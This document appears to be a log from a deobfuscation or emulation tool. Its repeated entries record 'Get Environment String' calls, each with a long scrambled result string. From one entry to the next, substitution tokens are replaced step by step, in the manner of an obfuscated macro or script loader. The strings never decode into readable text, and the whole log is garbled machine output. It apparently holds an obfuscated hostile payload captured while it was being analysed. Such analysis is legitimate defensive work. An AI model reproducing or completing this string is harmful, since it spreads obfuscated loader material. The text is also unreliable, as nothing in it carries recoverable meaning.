zwLh2+23pX2+2X]11F3pbfbf2+2k7yuuQeGC7yGC7y'u-3QeAC6n37jUn5):jUnbf)-3QeACX]2+21F3pbfbfk7yuuQeGC7y2+2GC7y'6wL.Y-3QeAC6n37.YjUn5))}2+2}[2+2e2+2wLXb12+2{jh`eo2GC7y2+28Pm'%8P72+2GC7y'wL2+2n,X37Zn2+2.2+2Pjy8 8 7Kjh7yjU6ee'2+26wL8PGC7yjh2+2GC7y]Zn.1F3pbfbf2+2k7yuuQe2+2mQe{ '2+2'2+2jUn2+2AC (2+2Pjy)2+2)2)'R8Pk7y3p67yjU6wL12AC6726xd{eo2%Ren6wLPjy{7yjU6%zwLh7K]Pjy#H)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]PjyACiy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{eo2%Ren6wLPjy{7yjU6%zwLh7K]PjyjUn4axH)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{eo2%Ren6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&.Yeo28P%.Y.Y6jUe/`6KwL,%zwLhPj.Y1.Z.YF3pbf6Re7K3QeAC3p8P8 8P:XbGC7y)'7y6TdvwL'enF3pbfPjQewL7yjU6XmuQe6njU'eqF3pbfN7yPjQe8Peo27yjU6RZGC7yy%11Tdjh.Y8PqF3pbfN7y8 eo23Td]7y)'F3pbf6Td38P.Y.Y).Y.Y^^^|GC7yyPj4wLReo2h8PZ7ywL3pTd.Y.Y-nXqF3pbfNZqF3pbfN%wL]67yjU6%e.Y.Y-qF3pbfNX3pPj.Y-4ZqF3pbfN.Y%zwLhe37378Pn.Y-8P78P,v%ePjqF3pbfNk7yPjTde,.Y3QeAC`GC7yy7Kjhjh.Y.Y-nPjGC7yy]PjzwLhe3p8P.Y.Y-7yjU6PjmuQe7KqF3pbfN37.Y.Y.Y.Y.Y^^^^^^^&1.Y@8PqF3pbfN7y8 7yjU6Xmeo2GC7yy8P,{H6xd4axH6xd4ax5Pjy-TdQXen22)1@Znk7yv%.Y).Y.Y^&^&.Y.Y,m37'8P7wL.Y.Y.Y,.,.Yo637Z/T.o True 1
Fn
Get Environment String name = \,}_, result_out = eo28PGC7y.Y.Yeo2vTd]F3pbf6K'.Y1.Y@eo2h8PZ7y8P3pTde37{jUnPjy+@eo2%zwLhwLTd3pe37{jUn#Pjy+2Xb2).Y112eo22+263p.YF3p2+2]2+2.YqF3pbfN2+28P4-Pj3Qe9h8PZ8P,2+2GC7y2+2[2+27K2+23737-%2+2`k7y8P.Y-7Keo22+2eo28Pm3Qe93p`2+2qF3pbfN6m8P.Y967jh`eo2GC7y8Pm'jU]62+242+2Zn.967[2+2F3pbfbfk7yuuQe37eo22+26KF3p].Yjh`eo2GC7y8P2+2m'2+2jU]64Zn2+2.'u2+2ZGC7ym6k7y11F3p].YqF3pbfN8PGC7y'a2+28P3Qe97yjU62+23pZ8PnGC7y)'2+2Pjk7y8PnR8P6371962+272+2%zwLhGC7yGC7yk7yeo28 ,.,.Zm6.2+28Peo24ax'Zm.3Qe9X2+27',X2+2m,.9 ,.F3pjUn,.2+2.6GC7y4axuQe7yeo2K_X'2+2k7yn.9672+2))[2+2F3pbfbfk7yuuQe2+2mQe6KF3p].Yu`2+2GC7y2+28P{Pjy.Y2+24axjUnH [1 '2+2'H)3Qe92+2jh2+2h8PZo\F3pX]8P6,%zwLh12+2F3pbf2+2bf2+2k7yuuQe7.YZn1 ''H2+24ax(2+2))\F3pbfbfk7yuuQe2+2GC7y2+2GC7y6KF3pbfbfk7yuuQe37eo2'6wL8P2+2GC7yGC7yyZ78P3p1F3pbfbfk7yuuQe76xd2+2F3pbf2+2bfk7yuuQe_2+2)[F3pbfbfk7yuuQemQe2+2{F3pbfbfk7yuuQe2+2_:H4axiy+F3pbfbfk7yuuQe7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh2+23pX2+2X]11F3pbfbf2+2k7yuuQeGC7yGC7y'u-3Qe96n37jUn5):jUnbf)-3Qe9X]2+21F3pbfbfk7yuuQeGC7y2+2GC7y'6wL.Y-3Qe96n37.YjUn5))}2+2}[2+2e2+2wLXb12+2{jh`eo2GC7y2+28Pm'%8P72+2GC7y'wL2+2n,X37Zn2+2.2+2Pjy8 8 7Kjh7yjU6ee'2+26wL8PGC7yjh2+2GC7y]Zn.1F3pbfbf2+2k7yuuQe2+2mQe{ '2+2'2+2jUn2+29 (2+2Pjy)2+2)2)'R8Pk7y3p67yjU6wL1296726xd{eo2%Ren6wLPjy{7yjU6%zwLh7K]Pjy#H)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{eo2%Ren6wLPjy{7yjU6%zwLh7K]PjyjUn4axH)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{eo2%Ren6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&.Yeo28P%.Y.Y6jUe/`6KwL,%zwLhPj.Y1.Z.YF3pbf6Re7K3Qe93p8P8 8P:XbGC7y)'7y6TdvwL'enF3pbfPjQewL7yjU6XmuQe6njU'eqF3pbfN7yPjQe8Peo27yjU6RZGC7yy%11Tdjh.Y8PqF3pbfN7y8 eo23Td]7y)'F3pbf6Td38P.Y.Y).Y.Y^^^|GC7yyPj4wLReo2h8PZ7ywL3pTd.Y.Y-nXqF3pbfNZqF3pbfN%wL]67yjU6%e.Y.Y-qF3pbfNX3pPj.Y-4ZqF3pbfN.Y%zwLhe37378Pn.Y-8P78P,v%ePjqF3pbfNk7yPjTde,.Y3Qe9`GC7yy7Kjhjh.Y.Y-nPjGC7yy]PjzwLhe3p8P.Y.Y-7yjU6PjmuQe7KqF3pbfN37.Y.Y.Y.Y.Y^^^^^^^&1.Y@8PqF3pbfN7y8 7yjU6Xmeo2GC7yy8P,{H6xd4axH6xd4ax5Pjy-TdQXen22)1@Znk7yv%.Y).Y.Y^&^&.Y.Y,m37'8P7wL.Y.Y.Y,.,.Yo637Z/T.o True 1
Fn
Get Environment String name = `?, result_out = s8PGC7y.Y.YsvTd]F3pbf6K'.Y1.Y@sh8PZ7y8P3pTde37{jUnPjy+@s%zwLhwLTd3pe37{jUn#Pjy+2Xb2).Y112s2+263p.YF3p2+2]2+2.YqF3pbfN2+28P4-Pj3Qe9h8PZ8P,2+2GC7y2+2[2+27K2+23737-%2+2`k7y8P.Y-7Ks2+2s8Pm3Qe93p`2+2qF3pbfN6m8P.Y967jh`sGC7y8Pm'jU]62+242+2Zn.967[2+2F3pbfbfk7yuuQe37s2+26KF3p].Yjh`sGC7y8P2+2m'2+2jU]64Zn2+2.'u2+2ZGC7ym6k7y11F3p].YqF3pbfN8PGC7y'a2+28P3Qe97yjU62+23pZ8PnGC7y)'2+2Pjk7y8PnR8P6371962+272+2%zwLhGC7yGC7yk7ys8 ,.,.Zm6.2+28Ps4ax'Zm.3Qe9X2+27',X2+2m,.9 ,.F3pjUn,.2+2.6GC7y4axuQe7ysK_X'2+2k7yn.9672+2))[2+2F3pbfbfk7yuuQe2+2mQe6KF3p].Yu`2+2GC7y2+28P{Pjy.Y2+24axjUnH [1 '2+2'H)3Qe92+2jh2+2h8PZo\F3pX]8P6,%zwLh12+2F3pbf2+2bf2+2k7yuuQe7.YZn1 ''H2+24ax(2+2))\F3pbfbfk7yuuQe2+2GC7y2+2GC7y6KF3pbfbfk7yuuQe37s'6wL8P2+2GC7yGC7yyZ78P3p1F3pbfbfk7yuuQe76xd2+2F3pbf2+2bfk7yuuQe_2+2)[F3pbfbfk7yuuQemQe2+2{F3pbfbfk7yuuQe2+2_:H4axiy+F3pbfbfk7yuuQe7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh2+23pX2+2X]11F3pbfbf2+2k7yuuQeGC7yGC7y'u-3Qe96n37jUn5):jUnbf)-3Qe9X]2+21F3pbfbfk7yuuQeGC7y2+2GC7y'6wL.Y-3Qe96n37.YjUn5))}2+2}[2+2e2+2wLXb12+2{jh`sGC7y2+28Pm'%8P72+2GC7y'wL2+2n,X37Zn2+2.2+2Pjy8 8 7Kjh7yjU6ee'2+26wL8PGC7yjh2+2GC7y]Zn.1F3pbfbf2+2k7yuuQe2+2mQe{ '2+2'2+2jUn2+29 (2+2Pjy)2+2)2)'R8Pk7y3p67yjU6wL1296726xd{s%Ren6wLPjy{7yjU6%zwLh7K]Pjy#H)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{s%Ren6wLPjy{7yjU6%zwLh7K]PjyjUn4axH)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{s%Ren6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&.Ys8P%.Y.Y6jUe/`6KwL,%zwLhPj.Y1.Z.YF3pbf6Re7K3Qe93p8P8 8P:XbGC7y)'7y6TdvwL'enF3pbfPjQewL7yjU6XmuQe6njU'eqF3pbfN7yPjQe8Ps7yjU6RZGC7yy%11Tdjh.Y8PqF3pbfN7y8 s3Td]7y)'F3pbf6Td38P.Y.Y).Y.Y^^^|GC7yyPj4wLRsh8PZ7ywL3pTd.Y.Y-nXqF3pbfNZqF3pbfN%wL]67yjU6%e.Y.Y-qF3pbfNX3pPj.Y-4ZqF3pbfN.Y%zwLhe37378Pn.Y-8P78P,v%ePjqF3pbfNk7yPjTde,.Y3Qe9`GC7yy7Kjhjh.Y.Y-nPjGC7yy]PjzwLhe3p8P.Y.Y-7yjU6PjmuQe7KqF3pbfN37.Y.Y.Y.Y.Y^^^^^^^&1.Y@8PqF3pbfN7y8 7yjU6XmsGC7yy8P,{H6xd4axH6xd4ax5Pjy-TdQXen22)1@Znk7yv%.Y).Y.Y^&^&.Y.Y,m37'8P7wL.Y.Y.Y,.,.Yo637Z/T.o True 1
Fn
Get Environment String name = @[~, result_out = s8PGC7y.Y.YsvTd]F3pbf6K'.Y1.Y@sh8PZ7y8P3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+2Xb2).Y112s2+263p.YF3p2+2]2+2.YqF3pbfN2+28P4-Pj3QI9h8PZ8P,2+2GC7y2+2[2+27K2+23737-%2+2`k7y8P.Y-7Ks2+2s8Pm3QI93p`2+2qF3pbfN6m8P.Y967jh`sGC7y8Pm'jU]62+242+2Zn.967[2+2F3pbfbfk7yuuQI37s2+26KF3p].Yjh`sGC7y8P2+2m'2+2jU]64Zn2+2.'u2+2ZGC7ym6k7y11F3p].YqF3pbfN8PGC7y'a2+28P3QI97yjU62+23pZ8PnGC7y)'2+2Pjk7y8PnR8P6371962+272+2%zwLhGC7yGC7yk7ys8 ,.,.Zm6.2+28Ps4ax'Zm.3QI9X2+27',X2+2m,.9 ,.F3pjUn,.2+2.6GC7y4axuQI7ysK_X'2+2k7yn.9672+2))[2+2F3pbfbfk7yuuQI2+2mQI6KF3p].Yu`2+2GC7y2+28P{Pjy.Y2+24axjUnH [1 '2+2'H)3QI92+2jh2+2h8PZo\F3pX]8P6,%zwLh12+2F3pbf2+2bf2+2k7yuuQI7.YZn1 ''H2+24ax(2+2))\F3pbfbfk7yuuQI2+2GC7y2+2GC7y6KF3pbfbfk7yuuQI37s'6wL8P2+2GC7yGC7yyZ78P3p1F3pbfbfk7yuuQI76xd2+2F3pbf2+2bfk7yuuQI_2+2)[F3pbfbfk7yuuQImQI2+2{F3pbfbfk7yuuQI2+2_:H4axiy+F3pbfbfk7yuuQI7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh2+23pX2+2X]11F3pbfbf2+2k7yuuQIGC7yGC7y'u-3QI96n37jUn5):jUnbf)-3QI9X]2+21F3pbfbfk7yuuQIGC7y2+2GC7y'6wL.Y-3QI96n37.YjUn5))}2+2}[2+2I2+2wLXb12+2{jh`sGC7y2+28Pm'%8P72+2GC7y'wL2+2n,X37Zn2+2.2+2Pjy8 8 7Kjh7yjU6II'2+26wL8PGC7yjh2+2GC7y]Zn.1F3pbfbf2+2k7yuuQI2+2mQI{ '2+2'2+2jUn2+29 (2+2Pjy)2+2)2)'R8Pk7y3p67yjU6wL1296726xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#H)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]PjyjUn4axH)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&.Ys8P%.Y.Y6jUI/`6KwL,%zwLhPj.Y1.Z.YF3pbf6RI7K3QI93p8P8 8P:XbGC7y)'7y6TdvwL'InF3pbfPjQIwL7yjU6XmuQI6njU'IqF3pbfN7yPjQI8Ps7yjU6RZGC7yy%11Tdjh.Y8PqF3pbfN7y8 s3Td]7y)'F3pbf6Td38P.Y.Y).Y.Y^^^|GC7yyPj4wLRsh8PZ7ywL3pTd.Y.Y-nXqF3pbfNZqF3pbfN%wL]67yjU6%I.Y.Y-qF3pbfNX3pPj.Y-4ZqF3pbfN.Y%zwLhI37378Pn.Y-8P78P,v%IPjqF3pbfNk7yPjTdI,.Y3QI9`GC7yy7Kjhjh.Y.Y-nPjGC7yy]PjzwLhI3p8P.Y.Y-7yjU6PjmuQI7KqF3pbfN37.Y.Y.Y.Y.Y^^^^^^^&1.Y@8PqF3pbfN7y8 7yjU6XmsGC7yy8P,{H6xd4axH6xd4ax5Pjy-TdQXIn22)1@Znk7yv%.Y).Y.Y^&^&.Y.Y,m37'8P7wL.Y.Y.Y,.,.Yo637Z/T.o True 1
Fn
Get Environment String name = @+*, result_out = s8PGC7ygYgYsvTd]F3pbf6K'gY1gY@sh8PZ7y8P3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+2Xb2)gY112s2+263pgYF3p2+2]2+2gYqF3pbfN2+28P4-Pj3QI9h8PZ8P,2+2GC7y2+2[2+27K2+23737-%2+2`k7y8PgY-7Ks2+2s8Pm3QI93p`2+2qF3pbfN6m8PgY967jh`sGC7y8Pm'jU]62+242+2Zng967[2+2F3pbfbfk7yuuQI37s2+26KF3p]gYjh`sGC7y8P2+2m'2+2jU]64Zn2+2g'u2+2ZGC7ym6k7y11F3p]gYqF3pbfN8PGC7y'a2+28P3QI97yjU62+23pZ8PnGC7y)'2+2Pjk7y8PnR8P6371962+272+2%zwLhGC7yGC7yk7ys8 ,g,gZm6g2+28Ps4ax'Zmg3QI9X2+27',X2+2m,g9 ,gF3pjUn,g2+2g6GC7y4axuQI7ysK_X'2+2k7yng9672+2))[2+2F3pbfbfk7yuuQI2+2mQI6KF3p]gYu`2+2GC7y2+28P{PjygY2+24axjUnH [1 '2+2'H)3QI92+2jh2+2h8PZo\F3pX]8P6,%zwLh12+2F3pbf2+2bf2+2k7yuuQI7gYZn1 ''H2+24ax(2+2))\F3pbfbfk7yuuQI2+2GC7y2+2GC7y6KF3pbfbfk7yuuQI37s'6wL8P2+2GC7yGC7yyZ78P3p1F3pbfbfk7yuuQI76xd2+2F3pbf2+2bfk7yuuQI_2+2)[F3pbfbfk7yuuQImQI2+2{F3pbfbfk7yuuQI2+2_:H4axiy+F3pbfbfk7yuuQI7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh2+23pX2+2X]11F3pbfbf2+2k7yuuQIGC7yGC7y'u-3QI96n37jUn5):jUnbf)-3QI9X]2+21F3pbfbfk7yuuQIGC7y2+2GC7y'6wLgY-3QI96n37gYjUn5))}2+2}[2+2I2+2wLXb12+2{jh`sGC7y2+28Pm'%8P72+2GC7y'wL2+2n,X37Zn2+2g2+2Pjy8 8 7Kjh7yjU6II'2+26wL8PGC7yjh2+2GC7y]Zng1F3pbfbf2+2k7yuuQI2+2mQI{ '2+2'2+2jUn2+29 (2+2Pjy)2+2)2)'R8Pk7y3p67yjU6wL1296726xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#H)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]PjyjUn4axH)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&gYs8P%gYgY6jUI/`6KwL,%zwLhPjgY1gZgYF3pbf6RI7K3QI93p8P8 8P:XbGC7y)'7y6TdvwL'InF3pbfPjQIwL7yjU6XmuQI6njU'IqF3pbfN7yPjQI8Ps7yjU6RZGC7yy%11TdjhgY8PqF3pbfN7y8 s3Td]7y)'F3pbf6Td38PgYgY)gYgY^^^|GC7yyPj4wLRsh8PZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]67yjU6%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI37378PngY-8P78P,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3p8PgYgY-7yjU6PjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@8PqF3pbfN7y8 7yjU6XmsGC7yy8P,{H6xd4axH6xd4ax5Pjy-TdQXIn22)1@Znk7yv%gY)gYgY^&^&gYgY,m37'8P7wLgYgYgY,g,gYo637Z/Tgo True 1
Fn
Get Environment String name = [{, result_out = seGC7ygYgYsvTd]F3pbf6K'gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+2Xb2)gY112s2+263pgYF3p2+2]2+2gYqF3pbfN2+2e4-Pj3QI9heZe,2+2GC7y2+2[2+27K2+23737-%2+2`k7yegY-7Ks2+2sem3QI93p`2+2qF3pbfN6megY967jh`sGC7yem'jU]62+242+2Zng967[2+2F3pbfbfk7yuuQI37s2+26KF3p]gYjh`sGC7ye2+2m'2+2jU]64Zn2+2g'u2+2ZGC7ym6k7y11F3p]gYqF3pbfNeGC7y'a2+2e3QI97yjU62+23pZenGC7y)'2+2Pjk7yenRe6371962+272+2%zwLhGC7yGC7yk7ys8 ,g,gZm6g2+2es4ax'Zmg3QI9X2+27',X2+2m,g9 ,gF3pjUn,g2+2g6GC7y4axuQI7ysK_X'2+2k7yng9672+2))[2+2F3pbfbfk7yuuQI2+2mQI6KF3p]gYu`2+2GC7y2+2e{PjygY2+24axjUnH [1 '2+2'H)3QI92+2jh2+2heZo\F3pX]e6,%zwLh12+2F3pbf2+2bf2+2k7yuuQI7gYZn1 ''H2+24ax(2+2))\F3pbfbfk7yuuQI2+2GC7y2+2GC7y6KF3pbfbfk7yuuQI37s'6wLe2+2GC7yGC7yyZ7e3p1F3pbfbfk7yuuQI76xd2+2F3pbf2+2bfk7yuuQI_2+2)[F3pbfbfk7yuuQImQI2+2{F3pbfbfk7yuuQI2+2_:H4axiy+F3pbfbfk7yuuQI7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh2+23pX2+2X]11F3pbfbf2+2k7yuuQIGC7yGC7y'u-3QI96n37jUn5):jUnbf)-3QI9X]2+21F3pbfbfk7yuuQIGC7y2+2GC7y'6wLgY-3QI96n37gYjUn5))}2+2}[2+2I2+2wLXb12+2{jh`sGC7y2+2em'%e72+2GC7y'wL2+2n,X37Zn2+2g2+2Pjy8 8 7Kjh7yjU6II'2+26wLeGC7yjh2+2GC7y]Zng1F3pbfbf2+2k7yuuQI2+2mQI{ '2+2'2+2jUn2+29 (2+2Pjy)2+2)2)'Rek7y3p67yjU6wL1296726xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#H)'Rek7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]PjyjUn4axH)'Rek7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&gYse%gYgY6jUI/`6KwL,%zwLhPjgY1gZgYF3pbf6RI7K3QI93pe8 e:XbGC7y)'7y6TdvwL'InF3pbfPjQIwL7yjU6XmuQI6njU'IqF3pbfN7yPjQIes7yjU6RZGC7yy%11TdjhgYeqF3pbfN7y8 s3Td]7y)'F3pbf6Td3egYgY)gYgY^^^|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]67yjU6%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI3737engY-e7e,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjU6PjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@eqF3pbfN7y8 7yjU6XmsGC7yye,{H6xd4axH6xd4ax5Pjy-TdQXIn22)1@Znk7yv%gY)gYgY^&^&gYgY,m37'e7wLgYgYgY,g,gYo637Z/Tgo True 1
Fn
Get Environment String name = {@}, result_out = seGC7ygYgYsvTd]F3pbf6K.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+2Xb2)gY112s2+263pgYF3p2+2]2+2gYqF3pbfN2+2e4-Pj3QI9heZe,2+2GC7y2+2[2+27K2+23737-%2+2`k7yegY-7Ks2+2sem3QI93p`2+2qF3pbfN6megY967jh`sGC7yem.jU]62+242+2Zng967[2+2F3pbfbfk7yuuQI37s2+26KF3p]gYjh`sGC7ye2+2m.2+2jU]64Zn2+2g.u2+2ZGC7ym6k7y11F3p]gYqF3pbfNeGC7y.a2+2e3QI97yjU62+23pZenGC7y).2+2Pjk7yenRe6371962+272+2%zwLhGC7yGC7yk7ys8 ,g,gZm6g2+2es4ax.Zmg3QI9X2+27.,X2+2m,g9 ,gF3pjUn,g2+2g6GC7y4axuQI7ysK_X.2+2k7yng9672+2))[2+2F3pbfbfk7yuuQI2+2mQI6KF3p]gYu`2+2GC7y2+2e{PjygY2+24axjUnH [1 .2+2.H)3QI92+2jh2+2heZo\F3pX]e6,%zwLh12+2F3pbf2+2bf2+2k7yuuQI7gYZn1 ..H2+24ax(2+2))\F3pbfbfk7yuuQI2+2GC7y2+2GC7y6KF3pbfbfk7yuuQI37s.6wLe2+2GC7yGC7yyZ7e3p1F3pbfbfk7yuuQI76xd2+2F3pbf2+2bfk7yuuQI_2+2)[F3pbfbfk7yuuQImQI2+2{F3pbfbfk7yuuQI2+2_:H4axiy+F3pbfbfk7yuuQI7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh2+23pX2+2X]11F3pbfbf2+2k7yuuQIGC7yGC7y.u-3QI96n37jUn5):jUnbf)-3QI9X]2+21F3pbfbfk7yuuQIGC7y2+2GC7y.6wLgY-3QI96n37gYjUn5))}2+2}[2+2I2+2wLXb12+2{jh`sGC7y2+2em.%e72+2GC7y.wL2+2n,X37Zn2+2g2+2Pjy8 8 7Kjh7yjU6II.2+26wLeGC7yjh2+2GC7y]Zng1F3pbfbf2+2k7yuuQI2+2mQI{ .2+2.2+2jUn2+29 (2+2Pjy)2+2)2).Rek7y3p67yjU6wL1296726xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#H).Rek7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]PjyjUn4axH).Rek7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&gYse%gYgY6jUI/`6KwL,%zwLhPjgY1gZgYF3pbf6RI7K3QI93pe8 e:XbGC7y).7y6TdvwL.InF3pbfPjQIwL7yjU6XmuQI6njU.IqF3pbfN7yPjQIes7yjU6RZGC7yy%11TdjhgYeqF3pbfN7y8 s3Td]7y).F3pbf6Td3egYgY)gYgY^^^|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]67yjU6%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI3737engY-e7e,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjU6PjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@eqF3pbfN7y8 7yjU6XmsGC7yye,{H6xd4axH6xd4ax5Pjy-TdQXIn22)1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYo637Z/Tgo True 1
Fn
Get Environment String name = \{, result_out = seGC7ygYgYsvTd]F3pbf6K.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+'Xb')gY11's'+'63pgYF3p'+']'+'gYqF3pbfN'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'7K'+'3737-%'+'`k7yegY-7Ks'+'sem3QI93p`'+'qF3pbfN6megY967jh`sGC7yem.jU]6'+'4'+'Zng967['+'F3pbfbfk7yuuQI37s'+'6KF3p]gYjh`sGC7ye'+'m.'+'jU]64Zn'+'g.u'+'ZGC7ym6k7y11F3p]gYqF3pbfNeGC7y.a'+'e3QI97yjU6'+'3pZenGC7y).'+'Pjk7yenRe637196'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZm6g'+'es4ax.Zmg3QI9X'+'7.,X'+'m,g9 ,gF3pjUn,g'+'g6GC7y4axuQI7ysK_X.'+'k7yng967'+'))['+'F3pbfbfk7yuuQI'+'mQI6KF3p]gYu`'+'GC7y'+'e{PjygY'+'4axjUnH [1 .'+'.H)3QI9'+'jh'+'heZo\F3pX]e6,%zwLh1'+'F3pbf'+'bf'+'k7yuuQI7gYZn1 ..H'+'4ax('+'))\F3pbfbfk7yuuQI'+'GC7y'+'GC7y6KF3pbfbfk7yuuQI37s.6wLe'+'GC7yGC7yyZ7e3p1F3pbfbfk7yuuQI76xd'+'F3pbf'+'bfk7yuuQI_'+')[F3pbfbfk7yuuQImQI'+'{F3pbfbfk7yuuQI'+'_:H4axiy+F3pbfbfk7yuuQI7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh'+'3pX'+'X]11F3pbfbf'+'k7yuuQIGC7yGC7y.u-3QI96n37jUn5):jUnbf)-3QI9X]'+'1F3pbfbfk7yuuQIGC7y'+'GC7y.6wLgY-3QI96n37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 7Kjh7yjU6II.'+'6wLeGC7yjh'+'GC7y]Zng1F3pbfbf'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7y3p67yjU6wL1'967'6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#H).Rek7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]PjyjUn4axH).Rek7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&gYse%gYgY6jUI/`6KwL,%zwLhPjgY1gZgYF3pbf6RI7K3QI93pe8 e:XbGC7y).7y6TdvwL.InF3pbfPjQIwL7yjU6XmuQI6njU.IqF3pbfN7yPjQIes7yjU6RZGC7yy%11TdjhgYeqF3pbfN7y8 s3Td]7y).F3pbf6Td3egYgY)gYgY^^^|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]67yjU6%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI3737engY-e7e,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjU6PjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@eqF3pbfN7y8 7yjU6XmsGC7yye,{H6xd4axH6xd4ax5Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYo637Z/Tgo True 1
Fn
